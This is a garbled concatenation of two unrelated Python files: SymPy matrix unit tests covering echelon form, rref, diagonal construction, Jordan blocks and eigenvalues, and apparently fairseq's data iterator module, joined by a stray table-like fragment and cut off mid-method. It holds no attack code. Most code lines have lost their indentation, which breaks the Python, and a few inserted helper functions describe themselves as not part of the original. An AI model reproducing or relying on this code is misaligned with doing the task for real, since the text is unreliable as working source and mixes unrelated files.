a = ReductionsOnlyMatrix(2, 3, [0]*6)
assert a.elementary_col_op("n->kn", 1, 5) == Matrix(2, 3, [0]*6)
assert a.elementary_col_op("n<->m", 0, 1) == Matrix(2, 3, [0]*6)
assert a.elementary_col_op("n->n+km", 0, 5, 1) == Matrix(2, 3, [0]*6)
def test_is_echelon():
zro = zeros_Reductions(3)
ident = eye_Reductions(3)
assert zro.is_echelon
assert ident.is_echelon
a = ReductionsOnlyMatrix(0, 0, [])
assert a.is_echelon
a = ReductionsOnlyMatrix(2, 3, [3, 2, 1, 0, 0, 6])
assert a.is_echelon
a = ReductionsOnlyMatrix(2, 3, [0, 0, 6, 3, 2, 1])
assert not a.is_echelon
x = Symbol('x')
a = ReductionsOnlyMatrix(3, 1, [x, 0, 0])
assert a.is_echelon
a = ReductionsOnlyMatrix(3, 1, [x, x, 0])
assert not a.is_echelon
a = ReductionsOnlyMatrix(3, 3, [0, 0, 0, 1, 2, 3, 0, 0, 0])
assert not a.is_echelon
def test_echelon_form():
# echelon form is not unique, but the result
# must be row-equivalent to the original matrix
# and it must be in echelon form.
a = zeros_Reductions(3)
e = eye_Reductions(3)
# we can assume the zero matrix and the identity matrix shouldn't change
assert a.echelon_form() == a
assert e.echelon_form() == e
a = ReductionsOnlyMatrix(0, 0, [])
assert a.echelon_form() == a
a = ReductionsOnlyMatrix(1, 1, [5])
assert a.echelon_form() == a
# now we get to the real tests
def verify_row_null_space(mat, rows, nulls):
for v in nulls:
assert all(t.is_zero for t in a_echelon*v)
for v in rows:
if not all(t.is_zero for t in v):
assert not all(t.is_zero for t in a_echelon*v.transpose())
a = ReductionsOnlyMatrix(3, 3, [1, 2, 3, 4, 5, 6, 7, 8, 9])
nulls = [Matrix([
[ 1],
[-2],
[ 1]])]
rows = [a[i,:] for i in range(a.rows)]
a_echelon = a.echelon_form()
assert a_echelon.is_echelon
verify_row_null_space(a, rows, nulls)
a = ReductionsOnlyMatrix(3, 3, [1, 2, 3, 4, 5, 6, 7, 8, 8])
nulls = []
rows = [a[i,:] for i in range(a.rows)]
a_echelon = a.echelon_form()
assert a_echelon.is_echelon
verify_row_null_space(a, rows, nulls)
a = ReductionsOnlyMatrix(3, 3, [2, 1, 3, 0, 0, 0, 2, 1, 3])
nulls = [Matrix([
[-S(1)/2],
[ 1],
[ 0]]),
Matrix([
[-S(3)/2],
[ 0],
[ 1]])]
rows = [a[i,:] for i in range(a.rows)]
a_echelon = a.echelon_form()
assert a_echelon.is_echelon
verify_row_null_space(a, rows, nulls)
# this one requires a row swap
a = ReductionsOnlyMatrix(3, 3, [2, 1, 3, 0, 0, 0, 1, 1, 3])
nulls = [Matrix([
[ 0],
[ -3],
[ 1]])]
rows = [a[i,:] for i in range(a.rows)]
a_echelon = a.echelon_form()
assert a_echelon.is_echelon
verify_row_null_space(a, rows, nulls)
a = ReductionsOnlyMatrix(3, 3, [0, 3, 3, 0, 2, 2, 0, 1, 1])
nulls = [Matrix([
[1],
[0],
[0]]),
Matrix([
[ 0],
[-1],
[ 1]])]
rows = [a[i,:] for i in range(a.rows)]
a_echelon = a.echelon_form()
assert a_echelon.is_echelon
verify_row_null_space(a, rows, nulls)
a = ReductionsOnlyMatrix(2, 3, [2, 2, 3, 3, 3, 0])
nulls = [Matrix([
[-1],
[1],
[0]])]
rows = [a[i,:] for i in range(a.rows)]
a_echelon = a.echelon_form()
assert a_echelon.is_echelon
verify_row_null_space(a, rows, nulls)
def test_rref():
e = ReductionsOnlyMatrix(0, 0, [])
assert e.rref(pivots=False) == e
e = ReductionsOnlyMatrix(1, 1, [1])
a = ReductionsOnlyMatrix(1, 1, [5])
assert e.rref(pivots=False) == a.rref(pivots=False) == e
a = ReductionsOnlyMatrix(3, 1, [1, 2, 3])
assert a.rref(pivots=False) == Matrix([[1], [0], [0]])
a = ReductionsOnlyMatrix(1, 3, [1, 2, 3])
assert a.rref(pivots=False) == Matrix([[1, 2, 3]])
a = ReductionsOnlyMatrix(3, 3, [1, 2, 3, 4, 5, 6, 7, 8, 9])
assert a.rref(pivots=False) == Matrix([
[1, 0, -1],
[0, 1, 2],
[0, 0, 0]])
a = ReductionsOnlyMatrix(3, 3, [1, 2, 3, 1, 2, 3, 1, 2, 3])
b = ReductionsOnlyMatrix(3, 3, [1, 2, 3, 0, 0, 0, 0, 0, 0])
c = ReductionsOnlyMatrix(3, 3, [0, 0, 0, 1, 2, 3, 0, 0, 0])
d = ReductionsOnlyMatrix(3, 3, [0, 0, 0, 0, 0, 0, 1, 2, 3])
assert a.rref(pivots=False) == \
b.rref(pivots=False) == \
c.rref(pivots=False) == \
d.rref(pivots=False) == b
e = eye_Reductions(3)
z = zeros_Reductions(3)
assert e.rref(pivots=False) == e
assert z.rref(pivots=False) == z
a = ReductionsOnlyMatrix([
[ 0, 0, 1, 2, 2, -5, 3],
[-1, 5, 2, 2, 1, -7, 5],
[ 0, 0, -2, -3, -3, 8, -5],
[-1, 5, 0, -1, -2, 1, 0]])
mat, pivot_offsets = a.rref()
assert mat == Matrix([
[1, -5, 0, 0, 1, 1, -1],
[0, 0, 1, 0, 0, -1, 1],
[0, 0, 0, 1, 1, -2, 1],
[0, 0, 0, 0, 0, 0, 0]])
assert pivot_offsets == (0, 2, 3)
a = ReductionsOnlyMatrix([[S(1)/19, S(1)/5, 2, 3],
[ 4, 5, 6, 7],
[ 8, 9, 10, 11],
[ 12, 13, 14, 15]])
assert a.rref(pivots=False) == Matrix([
[1, 0, 0, -S(76)/157],
[0, 1, 0, -S(5)/157],
[0, 0, 1, S(238)/157],
[0, 0, 0, 0]])
x = Symbol('x')
a = ReductionsOnlyMatrix(2, 3, [x, 1, 1, sqrt(x), x, 1])
for i, j in zip(a.rref(pivots=False),
[1, 0, sqrt(x)*(-x + 1)/(-x**(S(5)/2) + x),
0, 1, 1/(sqrt(x) + x + 1)]):
assert simplify(i - j).is_zero
# SpecialOnlyMatrix tests
def test_eye():
assert list(SpecialOnlyMatrix.eye(2,2)) == [1, 0, 0, 1]
assert list(SpecialOnlyMatrix.eye(2)) == [1, 0, 0, 1]
assert type(SpecialOnlyMatrix.eye(2)) == SpecialOnlyMatrix
assert type(SpecialOnlyMatrix.eye(2, cls=Matrix)) == Matrix
def test_ones():
assert list(SpecialOnlyMatrix.ones(2,2)) == [1, 1, 1, 1]
assert list(SpecialOnlyMatrix.ones(2)) == [1, 1, 1, 1]
assert SpecialOnlyMatrix.ones(2,3) == Matrix([[1, 1, 1], [1, 1, 1]])
assert type(SpecialOnlyMatrix.ones(2)) == SpecialOnlyMatrix
assert type(SpecialOnlyMatrix.ones(2, cls=Matrix)) == Matrix
def test_zeros():
assert list(SpecialOnlyMatrix.zeros(2,2)) == [0, 0, 0, 0]
assert list(SpecialOnlyMatrix.zeros(2)) == [0, 0, 0, 0]
assert SpecialOnlyMatrix.zeros(2,3) == Matrix([[0, 0, 0], [0, 0, 0]])
assert type(SpecialOnlyMatrix.zeros(2)) == SpecialOnlyMatrix
assert type(SpecialOnlyMatrix.zeros(2, cls=Matrix)) == Matrix
def test_diag_make():
diag = SpecialOnlyMatrix.diag
a = Matrix([[1, 2], [2, 3]])
b = Matrix([[3, x], [y, 3]])
c = Matrix([[3, x, 3], [y, 3, z], [x, y, z]])
assert diag(a, b, b) == Matrix([
[1, 2, 0, 0, 0, 0],
[2, 3, 0, 0, 0, 0],
[0, 0, 3, x, 0, 0],
[0, 0, y, 3, 0, 0],
[0, 0, 0, 0, 3, x],
[0, 0, 0, 0, y, 3],
])
assert diag(a, b, c) == Matrix([
[1, 2, 0, 0, 0, 0, 0],
[2, 3, 0, 0, 0, 0, 0],
[0, 0, 3, x, 0, 0, 0],
[0, 0, y, 3, 0, 0, 0],
[0, 0, 0, 0, 3, x, 3],
[0, 0, 0, 0, y, 3, z],
[0, 0, 0, 0, x, y, z],
])
assert diag(a, c, b) == Matrix([
[1, 2, 0, 0, 0, 0, 0],
[2, 3, 0, 0, 0, 0, 0],
[0, 0, 3, x, 3, 0, 0],
[0, 0, y, 3, z, 0, 0],
[0, 0, x, y, z, 0, 0],
[0, 0, 0, 0, 0, 3, x],
[0, 0, 0, 0, 0, y, 3],
])
a = Matrix([x, y, z])
b = Matrix([[1, 2], [3, 4]])
c = Matrix([[5, 6]])
# this "wandering diagonal" is what makes this
# a block diagonal where each block is independent
# of the others
assert diag(a, 7, b, c) == Matrix([
[x, 0, 0, 0, 0, 0],
[y, 0, 0, 0, 0, 0],
[z, 0, 0, 0, 0, 0],
[0, 7, 0, 0, 0, 0],
[0, 0, 1, 2, 0, 0],
[0, 0, 3, 4, 0, 0],
[0, 0, 0, 0, 5, 6]])
raises(ValueError, lambda: diag(a, 7, b, c, rows=5))
assert diag(1) == Matrix([[1]])
assert diag(1, rows=2) == Matrix([[1, 0], [0, 0]])
assert diag(1, cols=2) == Matrix([[1, 0], [0, 0]])
assert diag(1, rows=3, cols=2) == Matrix([[1, 0], [0, 0], [0, 0]])
assert diag(*[2, 3]) == Matrix([
[2, 0],
[0, 3]])
assert diag(Matrix([2, 3])) == Matrix([
[2],
[3]])
assert diag([1, [2, 3], 4], unpack=False) == \
diag([[1], [2, 3], [4]], unpack=False) == Matrix([
[1, 0],
[2, 3],
[4, 0]])
assert type(diag(1)) == SpecialOnlyMatrix
assert type(diag(1, cls=Matrix)) == Matrix
assert Matrix.diag([1, 2, 3]) == Matrix.diag(1, 2, 3)
assert Matrix.diag([1, 2, 3], unpack=False).shape == (3, 1)
assert Matrix.diag([[1, 2, 3]]).shape == (3, 1)
assert Matrix.diag([[1, 2, 3]], unpack=False).shape == (1, 3)
assert Matrix.diag([[[1, 2, 3]]]).shape == (1, 3)
# kerning can be used to move the starting point
assert Matrix.diag(ones(0, 2), 1, 2) == Matrix([
[0, 0, 1, 0],
[0, 0, 0, 2]])
assert Matrix.diag(ones(2, 0), 1, 2) == Matrix([
[0, 0],
[0, 0],
[1, 0],
[0, 2]])
def test_diagonal():
m = Matrix(3, 3, range(9))
d = m.diagonal()
assert d == m.diagonal(0)
assert tuple(d) == (0, 4, 8)
assert tuple(m.diagonal(1)) == (1, 5)
assert tuple(m.diagonal(-1)) == (3, 7)
assert tuple(m.diagonal(2)) == (2,)
assert type(m.diagonal()) == type(m)
s = SparseMatrix(3, 3, {(1, 1): 1})
assert type(s.diagonal()) == type(s)
assert type(m) != type(s)
raises(ValueError, lambda: m.diagonal(3))
raises(ValueError, lambda: m.diagonal(-3))
raises(ValueError, lambda: m.diagonal(pi))
def test_jordan_block():
assert SpecialOnlyMatrix.jordan_block(3, 2) == SpecialOnlyMatrix.jordan_block(3, eigenvalue=2) \
== SpecialOnlyMatrix.jordan_block(size=3, eigenvalue=2) \
== SpecialOnlyMatrix.jordan_block(3, 2, band='upper') \
== SpecialOnlyMatrix.jordan_block(
size=3, eigenval=2, eigenvalue=2) \
== Matrix([
[2, 1, 0],
[0, 2, 1],
[0, 0, 2]])
assert SpecialOnlyMatrix.jordan_block(3, 2, band='lower') == Matrix([
[2, 0, 0],
[1, 2, 0],
[0, 1, 2]])
# missing eigenvalue
raises(ValueError, lambda: SpecialOnlyMatrix.jordan_block(2))
# non-integral size
raises(ValueError, lambda: SpecialOnlyMatrix.jordan_block(3.5, 2))
# size not specified
raises(ValueError, lambda: SpecialOnlyMatrix.jordan_block(eigenvalue=2))
# inconsistent eigenvalue
raises(ValueError,
lambda: SpecialOnlyMatrix.jordan_block(
eigenvalue=2, eigenval=4))
# Deprecated feature
raises(SymPyDeprecationWarning,
lambda: SpecialOnlyMatrix.jordan_block(cols=3, eigenvalue=2))
raises(SymPyDeprecationWarning,
lambda: SpecialOnlyMatrix.jordan_block(rows=3, eigenvalue=2))
with warns_deprecated_sympy():
assert SpecialOnlyMatrix.jordan_block(3, 2) == \
SpecialOnlyMatrix.jordan_block(cols=3, eigenvalue=2) == \
SpecialOnlyMatrix.jordan_block(rows=3, eigenvalue=2)
with warns_deprecated_sympy():
assert SpecialOnlyMatrix.jordan_block(
rows=4, cols=3, eigenvalue=2) == \
Matrix([
[2, 1, 0],
[0, 2, 1],
[0, 0, 2],
[0, 0, 0]])
# Using alias keyword
assert SpecialOnlyMatrix.jordan_block(size=3, eigenvalue=2) == \
SpecialOnlyMatrix.jordan_block(size=3, eigenval=2)
# SubspaceOnlyMatrix tests
def test_columnspace():
m = SubspaceOnlyMatrix([[ 1, 2, 0, 2, 5],
[-2, -5, 1, -1, -8],
[ 0, -3, 3, 4, 1],
[ 3, 6, 0, -7, 2]])
basis = m.columnspace()
assert basis[0] == Matrix([1, -2, 0, 3])
assert basis[1] == Matrix([2, -5, -3, 6])
assert basis[2] == Matrix([2, -1, 4, -7])
assert len(basis) == 3
assert Matrix.hstack(m, *basis).columnspace() == basis
def test_rowspace():
m = SubspaceOnlyMatrix([[ 1, 2, 0, 2, 5],
[-2, -5, 1, -1, -8],
[ 0, -3, 3, 4, 1],
[ 3, 6, 0, -7, 2]])
basis = m.rowspace()
assert basis[0] == Matrix([[1, 2, 0, 2, 5]])
assert basis[1] == Matrix([[0, -1, 1, 3, 2]])
assert basis[2] == Matrix([[0, 0, 0, 5, 5]])
assert len(basis) == 3
def test_nullspace():
m = SubspaceOnlyMatrix([[ 1, 2, 0, 2, 5],
[-2, -5, 1, -1, -8],
[ 0, -3, 3, 4, 1],
[ 3, 6, 0, -7, 2]])
basis = m.nullspace()
assert basis[0] == Matrix([-2, 1, 1, 0, 0])
assert basis[1] == Matrix([-1, -1, 0, -1, 1])
    # make sure the null space really gets zeroed
assert all(e.is_zero for e in m*basis[0])
assert all(e.is_zero for e in m*basis[1])
def test_orthogonalize():
m = Matrix([[1, 2], [3, 4]])
assert m.orthogonalize(Matrix([[2], [1]])) == [Matrix([[2], [1]])]
assert m.orthogonalize(Matrix([[2], [1]]), normalize=True) == [Matrix([[2*sqrt(5)/5], [sqrt(5)/5]])]
assert m.orthogonalize(Matrix([[1], [2]]), Matrix([[-1], [4]])) == [Matrix([[1], [2]]), Matrix([[-S(12)/5], [S(6)/5]])]
assert m.orthogonalize(Matrix([[0], [0]]), Matrix([[-1], [4]])) == [Matrix([[-1], [4]])]
assert m.orthogonalize(Matrix([[0], [0]])) == []
n = Matrix([[9, 1, 9], [3, 6, 10], [8, 5, 2]])
vecs = [Matrix([[-5], [1]]), Matrix([[-5], [2]]), Matrix([[-5], [-2]])]
assert n.orthogonalize(*vecs) == [Matrix([[-5], [1]]), Matrix([[S(5)/26], [S(25)/26]])]
# EigenOnlyMatrix tests
def test_eigenvals():
M = EigenOnlyMatrix([[0, 1, 1],
[1, 0, 0],
[1, 1, 1]])
assert M.eigenvals() == {2*S.One: 1, -S.One: 1, S.Zero: 1}
# if we cannot factor the char poly, we raise an error
m = Matrix([
[3, 0, 0, 0, -3],
[0, -3, -3, 0, 3],
[0, 3, 0, 3, 0],
[0, 0, 3, 0, 3],
[3, 0, 0, 3, 0]])
raises(MatrixError, lambda: m.eigenvals())
def test_eigenvects():
M = EigenOnlyMatrix([[0, 1, 1],
[1, 0, 0],
[1, 1, 1]])
vecs = M.eigenvects()
for val, mult, vec_list in vecs:
assert len(vec_list) == 1
assert M*vec_list[0] == val*vec_list[0]
def test_left_eigenvects():
M = EigenOnlyMatrix([[0, 1, 1],
[1, 0, 0],
[1, 1, 1]])
vecs = M.left_eigenvects()
for val, mult, vec_list in vecs:
assert len(vec_list) == 1
assert vec_list[0]*M == val*vec_list[0]
def test_diagonalize():
m = EigenOnlyMatrix(2, 2, [0, -1, 1, 0])
raises(MatrixError, lambda: m.diagonalize(reals_only=True))
P, D = m.diagonalize()
assert D.is_diagonal()
assert D == Matrix([
[-I, 0],
[ 0, I]])
    # make sure we get floats out if floats are passed in
m = EigenOnlyMatrix(2, 2, [0, .5, .5, 0])
P, D = m.diagonalize()
assert all(isinstance(e, Float) for e in D.values())
assert all(isinstance(e, Float) for e in P.values())
_, D2 = m.diagonalize(reals_only=True)
assert D == D2
def test_is_diagonalizable():
a, b, c = symbols('a b c')
m = EigenOnlyMatrix(2, 2, [a, c, c, b])
assert m.is_symmetric()
assert m.is_diagonalizable()
assert not EigenOnlyMatrix(2, 2, [1, 1, 0, 1]).is_diagonalizable()
m = EigenOnlyMatrix(2, 2, [0, -1, 1, 0])
assert m.is_diagonalizable()
assert not m.is_diagonalizable(reals_only=True)
def test_jordan_form():
m = Matrix(3, 2, [-3, 1, -3, 20, 3, 10])
raises(NonSquareMatrixError, lambda: m.jordan_form())
# the next two tests test the cases where the old
# algorithm failed due to the fact that the block structure can
    # *NOT* be determined from algebraic and geometric multiplicity alone.
    # This can be seen most easily by computing the J.c.f. of a matrix that
    # is already in J.c.f.
m = EigenOnlyMatrix(4, 4, [2, 1, 0, 0,
0, 2, 1, 0,
0, 0, 2, 0,
0, 0, 0, 2
])
P, J = m.jordan_form()
assert m == J
m = EigenOnlyMatrix(4, 4, [2, 1, 0, 0,
0, 2, 0, 0,
0, 0, 2, 1,
0, 0, 0, 2
])
P, J = m.jordan_form()
assert m == J
A = Matrix([[ 2, 4, 1, 0],
[-4, 2, 0, 1],
[ 0, 0, 2, 4],
[ 0, 0, -4, 2]])
P, J = A.jordan_form()
assert simplify(P*J*P.inv()) == A
assert EigenOnlyMatrix(1,1,[1]).jordan_form() == (Matrix([1]), Matrix([1]))
assert EigenOnlyMatrix(1,1,[1]).jordan_form(calc_transform=False) == Matrix([1])
# make sure if we cannot factor the characteristic polynomial, we raise an error
m = Matrix([[3, 0, 0, 0, -3], [0, -3, -3, 0, 3], [0, 3, 0, 3, 0], [0, 0, 3, 0, 3], [3, 0, 0, 3, 0]])
raises(MatrixError, lambda: m.jordan_form())
# make sure that if the input has floats, the output does too
m = Matrix([
[ 0.6875, 0.125 + 0.1875*sqrt(3)],
[0.125 + 0.1875*sqrt(3), 0.3125]])
P, J = m.jordan_form()
assert all(isinstance(x, Float) or x == 0 for x in P)
assert all(isinstance(x, Float) or x == 0 for x in J)
def test_singular_values():
x = Symbol('x', real=True)
A = EigenOnlyMatrix([[0, 1*I], [2, 0]])
# if singular values can be sorted, they should be in decreasing order
assert A.singular_values() == [2, 1]
A = eye(3)
A[1, 1] = x
A[2, 2] = 5
vals = A.singular_values()
# since Abs(x) cannot be sorted, test set equality
assert set(vals) == set([5, 1, Abs(x)])
A = EigenOnlyMatrix([[sin(x), cos(x)], [-cos(x), sin(x)]])
vals = [sv.trigsimp() for sv in A.singular_values()]
assert vals == [S(1), S(1)]
A = EigenOnlyMatrix([
[2, 4],
[1, 3],
[0, 0],
[0, 0]
])
assert A.singular_values() == \
[sqrt(sqrt(221) + 15), sqrt(15 - sqrt(221))]
assert A.T.singular_values() == \
[sqrt(sqrt(221) + 15), sqrt(15 - sqrt(221)), 0, 0]
# CalculusOnlyMatrix tests
@XFAIL
def test_diff():
x, y = symbols('x y')
m = CalculusOnlyMatrix(2, 1, [x, y])
# TODO: currently not working as ``_MinimalMatrix`` cannot be sympified:
assert m.diff(x) == Matrix(2, 1, [1, 0])
def test_integrate():
x, y = symbols('x y')
m = CalculusOnlyMatrix(2, 1, [x, y])
assert m.integrate(x) == Matrix(2, 1, [x**2/2, y*x])
def test_jacobian2():
rho, phi = symbols("rho,phi")
X = CalculusOnlyMatrix(3, 1, [rho*cos(phi), rho*sin(phi), rho**2])
Y = CalculusOnlyMatrix(2, 1, [rho, phi])
J = Matrix([
[cos(phi), -rho*sin(phi)],
[sin(phi), rho*cos(phi)],
[ 2*rho, 0],
])
assert X.jacobian(Y) == J
m = CalculusOnlyMatrix(2, 2, [1, 2, 3, 4])
m2 = CalculusOnlyMatrix(4, 1, [1, 2, 3, 4])
raises(TypeError, lambda: m.jacobian(Matrix([1,2])))
raises(TypeError, lambda: m2.jacobian(m))
def test_limit():
x, y = symbols('x y')
m = CalculusOnlyMatrix(2, 1, [1/x, y])
assert m.limit(x, 5) == Matrix(2, 1, [S(1)/5, y])
def test_issue_13774():
M = Matrix([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
v = [1,1,1]
raises(TypeError, lambda: M*v)
raises(TypeError, lambda: v*M)
def test___eq__():
assert (EigenOnlyMatrix(
[[0, 1, 1],
[1, 0, 0],
[1, 1, 1]]) == {}) is False | b = Matrix([[3, x], [y, 3]])
c = Matrix([[3, x, 3], [y, 3, z], [x, y, z]])
assert a.get_diag_blocks() == [a]
assert b.get_diag_blocks() == [b] |
iterators.py | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import itertools
import logging
import math
import operator
import os
import queue
import time
from threading import Thread
import numpy as np
import torch
from fairseq.data import data_utils
logger = logging.getLogger(__name__)
# Object used by _background_consumer to signal the source is exhausted
# to the main thread.
_sentinel = object()
class CountingIterator(object):
"""Wrapper around an iterable that maintains the iteration count.
Args:
iterable (iterable): iterable to wrap
start (int): starting iteration count. Note that this doesn't
actually advance the iterator.
total (int): override the iterator length returned by
            ``__len__``. This can be used to truncate the iterator.
Attributes:
n (int): number of elements consumed from this iterator
"""
def __init__(self, iterable, start=None, total=None):
self.iterable = iterable
self.itr = iter(self)
if start is None:
self.n = getattr(iterable, 'n', 0)
else:
self.n = start
if total is None:
self.total = self.n + len(iterable)
else:
self.total = total
def __len__(self):
return self.total
def __iter__(self):
for x in self.iterable:
if self.n >= self.total:
raise RuntimeError(
'Mismatch between actual and expected iterable length. '
'Please report this to the fairseq developers.'
)
self.n += 1
yield x
def __next__(self):
return next(self.itr)
def has_next(self):
"""Whether the iterator has been exhausted."""
return self.n < len(self)
def skip(self, num_to_skip):
"""Fast-forward the iterator by skipping *num_to_skip* elements."""
        # islice() consumes *num_to_skip* elements before reaching the empty
        # slice; next() with a default simply drives that consumption.
        next(itertools.islice(self.itr, num_to_skip, num_to_skip), None)
return self
def take(self, n):
"""
Truncates the iterator to n elements at most.
"""
self.total = min(self.total, n)
# Propagate this change to the underlying iterator
# Only take after what we have already consumed (i.e. after restarting
# from checkpoint mid epoch, we have to subtract self.n which is the
# starting point)
#
        # This is to maintain the invariant self.total = self.n + len(iterable),
# before calling __next__ or __iter__
propagated_take = max(n - self.n, 0)
if hasattr(self.iterable, "take"):
self.iterable.take(propagated_take)
else:
self.iterable = itertools.islice(self.iterable, propagated_take)
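# Usage sketch (an assumption, not part of fairseq): the start/total
# bookkeeping described in the CountingIterator docstring above.
def _counting_iterator_demo():
    itr = CountingIterator(list(range(10)))
    next(itr)
    next(itr)  # two elements consumed -> itr.n == 2
    itr.take(5)  # truncate to at most 5 elements in total
    assert itr.n == 2 and len(itr) == 5 and itr.has_next()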
class EpochBatchIterating(object):
def __len__(self) -> int:
raise NotImplementedError
@property
def next_epoch_idx(self):
raise NotImplementedError
def next_epoch_itr(self, shuffle=True, fix_batches_to_gpus=False):
"""Return a new iterator over the dataset.
Args:
shuffle (bool, optional): shuffle batches before returning the
iterator (default: True).
fix_batches_to_gpus: ensure that batches are always
allocated to the same shards across epochs. Requires
that :attr:`dataset` supports prefetching (default: False).
"""
raise NotImplementedError
def end_of_epoch(self) -> bool:
"""Returns whether the most recent epoch iterator has been exhausted"""
raise NotImplementedError
@property
def iterations_in_epoch(self) -> int:
"""The number of consumed batches in the current epoch."""
raise NotImplementedError
def state_dict(self):
"""Returns a dictionary containing a whole state of the iterator."""
raise NotImplementedError
def load_state_dict(self, state_dict):
"""Copies the state of the iterator from the given *state_dict*."""
raise NotImplementedError
class StreamingEpochBatchIterator(EpochBatchIterating):
def __init__(
self, dataset, epoch=1, num_shards=1, shard_id=0,
):
assert isinstance(dataset, torch.utils.data.IterableDataset)
self.dataset = dataset
self.epoch = max(epoch, 1) # we use 1-based indexing for epochs
self._current_epoch_iterator = None
self.num_shards = num_shards
self.shard_id = shard_id
@property
def next_epoch_idx(self):
"""Return the epoch index after *next_epoch_itr* is called."""
if self._current_epoch_iterator is not None and self.end_of_epoch():
return self.epoch + 1
else:
return self.epoch
def next_epoch_itr(self, shuffle=True, fix_batches_to_gpus=False):
self.epoch = self.next_epoch_idx
self.dataset.set_epoch(self.epoch)
self._current_epoch_iterator = CountingIterator(
iterable=ShardedIterator(
iterable=self.dataset,
num_shards=self.num_shards,
shard_id=self.shard_id,
),
)
return self._current_epoch_iterator
def end_of_epoch(self) -> bool:
return not self._current_epoch_iterator.has_next()
@property
def iterations_in_epoch(self) -> int:
if self._current_epoch_iterator is not None:
return self._current_epoch_iterator.n
return 0
def state_dict(self):
return {
'epoch': self.epoch,
}
def load_state_dict(self, state_dict):
self.epoch = state_dict['epoch']
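# Hypothetical sketch (not part of fairseq): driving a
# StreamingEpochBatchIterator over a tiny IterableDataset (with a __len__,
# which the sharded wrapper requires) split into two shards; shard 0 sees
# every 2nd element.
class _TinyStream(torch.utils.data.IterableDataset):
    def __iter__(self):
        return iter(range(8))

    def __len__(self):
        return 8  # the sharded wrapper needs a length to size each shard

    def set_epoch(self, epoch):
        pass  # a real streaming dataset would reseed its shuffling here


def _streaming_iterator_demo():
    itr = StreamingEpochBatchIterator(_TinyStream(), num_shards=2, shard_id=0)
    epoch_itr = itr.next_epoch_itr()
    assert list(epoch_itr) == [0, 2, 4, 6]
    assert itr.end_of_epoch()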
class EpochBatchIterator(EpochBatchIterating):
"""A multi-epoch iterator over a :class:`torch.utils.data.Dataset`.
Compared to :class:`torch.utils.data.DataLoader`, this iterator:
- can be reused across multiple epochs with the :func:`next_epoch_itr`
method (optionally shuffled between epochs)
- can be serialized/deserialized with the :func:`state_dict` and
:func:`load_state_dict` methods
- supports sharding with the *num_shards* and *shard_id* arguments
Args:
dataset (~torch.utils.data.Dataset): dataset from which to load the data
collate_fn (callable): merges a list of samples to form a mini-batch
batch_sampler (~torch.utils.data.Sampler or a callable): an iterator over batches of
            indices, or a callable that creates such an iterator (~torch.utils.data.Sampler).
            A callable batch_sampler is invoked once per epoch, which allows the
            batch iterator to be rebuilt dynamically for each epoch.
seed (int, optional): seed for random number generator for
reproducibility (default: 1).
num_shards (int, optional): shard the data iterator into N
shards (default: 1).
shard_id (int, optional): which shard of the data iterator to
return (default: 0).
num_workers (int, optional): how many subprocesses to use for data
loading. 0 means the data will be loaded in the main process
(default: 0).
epoch (int, optional): the epoch to start the iterator from
(default: 1).
buffer_size (int, optional): the number of batches to keep ready in the
            queue. Helps speed up data loading. When buffer_size is zero, the
default torch.utils.data.DataLoader preloading is used.
timeout (int, optional): if positive, the timeout value for collecting a batch
from workers. Should always be non-negative. (default: ``0``)
"""
def __init__(
self, dataset, collate_fn, batch_sampler, seed=1, num_shards=1, shard_id=0,
num_workers=0, epoch=1, buffer_size=0, timeout=0,
):
assert isinstance(dataset, torch.utils.data.Dataset)
self.dataset = dataset
self.collate_fn = collate_fn
self.batch_sampler = batch_sampler
self._frozen_batches = tuple(batch_sampler) if not callable(batch_sampler) else None
self.seed = seed
self.num_shards = num_shards
self.shard_id = shard_id
self.num_workers = num_workers
# This upper limit here is to prevent people from abusing this feature
# in a shared computing environment.
self.buffer_size = min(buffer_size, 20)
self.timeout = timeout
self.epoch = max(epoch, 1) # we use 1-based indexing for epochs
self.shuffle = True
self._cur_epoch_itr = None
self._next_epoch_itr = None
self._supports_prefetch = getattr(dataset, 'supports_prefetch', False)
@property
def frozen_batches(self):
if self._frozen_batches is None:
self._frozen_batches = tuple(self.batch_sampler(self.dataset, self.epoch))
return self._frozen_batches
def __len__(self):
return int(math.ceil(len(self.frozen_batches) / float(self.num_shards)))
@property
def n(self):
return self.iterations_in_epoch
@property
def next_epoch_idx(self):
"""Return the epoch index after *next_epoch_itr* is called."""
if self._next_epoch_itr is not None:
return self.epoch
elif self._cur_epoch_itr is not None and self.end_of_epoch():
return self.epoch + 1
else:
return self.epoch
def next_epoch_itr(self, shuffle=True, fix_batches_to_gpus=False):
"""Return a new iterator over the dataset.
Args:
shuffle (bool, optional): shuffle batches before returning the
iterator (default: True).
fix_batches_to_gpus: ensure that batches are always
allocated to the same shards across epochs. Requires
that :attr:`dataset` supports prefetching (default: False).
"""
self.epoch = self.next_epoch_idx
self.dataset.set_epoch(self.epoch)
if self._next_epoch_itr is not None:
self._cur_epoch_itr = self._next_epoch_itr
self._next_epoch_itr = None
else:
if callable(self.batch_sampler):
# reset _frozen_batches to refresh the next epoch
self._frozen_batches = None
self._cur_epoch_itr = self._get_iterator_for_epoch(
self.epoch, shuffle, fix_batches_to_gpus=fix_batches_to_gpus,
)
self.shuffle = shuffle
return self._cur_epoch_itr
def end_of_epoch(self) -> bool:
"""Returns whether the most recent epoch iterator has been exhausted"""
return not self._cur_epoch_itr.has_next()
@property
def iterations_in_epoch(self):
"""The number of consumed batches in the current epoch."""
if self._cur_epoch_itr is not None:
return self._cur_epoch_itr.n
elif self._next_epoch_itr is not None:
return self._next_epoch_itr.n
return 0
def state_dict(self):
"""Returns a dictionary containing a whole state of the iterator."""
if self.end_of_epoch():
epoch = self.epoch + 1
iter_in_epoch = 0
else:
epoch = self.epoch
iter_in_epoch = self.iterations_in_epoch
return {
'version': 2,
'epoch': epoch,
'iterations_in_epoch': iter_in_epoch,
'shuffle': self.shuffle,
}
def load_state_dict(self, state_dict):
"""Copies the state of the iterator from the given *state_dict*."""
self.epoch = state_dict['epoch']
itr_pos = state_dict.get('iterations_in_epoch', 0)
version = state_dict.get('version', 1)
if itr_pos > 0:
# fast-forward epoch iterator
self._next_epoch_itr = self._get_iterator_for_epoch(
self.epoch,
shuffle=state_dict.get('shuffle', True),
offset=itr_pos,
)
if self._next_epoch_itr is None:
if version == 1:
# legacy behavior: we finished the epoch, increment epoch counter
self.epoch += 1
else:
raise RuntimeError(
'Cannot resume training due to dataloader mismatch, please '
'report this to the fairseq developers. You can relaunch '
'training with `--reset-dataloader` and it should work.'
)
else:
